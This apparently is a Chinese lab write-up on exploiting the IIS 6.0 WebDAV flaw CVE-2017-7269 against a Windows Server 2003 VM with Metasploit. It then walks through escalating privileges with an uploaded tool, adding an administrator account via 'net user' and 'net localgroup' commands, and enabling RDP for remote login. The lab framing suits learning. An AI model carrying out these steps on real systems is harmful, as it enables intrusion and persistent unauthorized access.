iis6.0远程代码执行漏洞

iis6.0远程代码执行漏洞

1、实验环境搭建

目标主机Windows server2003 sp2

img

2、目标服务器需要在IIS里面开启WebDAV

img

3、靶机IP:192.168.149.136(需要改成自己虚拟机win2003的地址)

Kali IP : 192.168.149.150(需要改成自己虚拟机kali的地址)

4、打开kali并且 把exp 复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下:
注:exp为资源包,可自行下载,稍后上传到csdn

https://download.csdn.net/download/G208_522/46134521

img

kali中启动Msfconsole,使用CVE-2017-7269攻击插件

输入:msfconsole启动metasploit

5、然后reload_all****重启****加载exp。

img

6、use exploit/windows/iis/cve_2017_7269。

img

7、使用show options查看相关参数。

img

8、设置目标主机,http主机,以及返回载荷。

img

9、设置完成,exploit

img

10、输入shell查看目前接入权限

img

11、进入C盘

img

12、使用md命令创建123文件夹

img

使用dir命令查看,以及存在123文件夹

img

13、使用IIS6.exe提权

输入exit退出至msf命令模式下 img

使用upload命令上传IIS6.exe以及3389.bat文件至win2003 C盘下123文件夹。

img

img

14、输入shell进入2003系统,使用提权工具,查看当前权限。

img

创建用户

IIS6.0.exe “net user zhangsan 123456 /add”

把张三加入到管理员组

IIS6.0.exe “net localgroup Administrators zhangsan /add”

img

查看系统是否开启3389端口。

img

使用iis6.exe 执行上传的3389.bat文件。

img

3389端口已经打开。

我们使用zhangsan用户进行远程连接。

打开win10下远程桌面(快捷命令为mstsc)

img

img

img

img

img

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值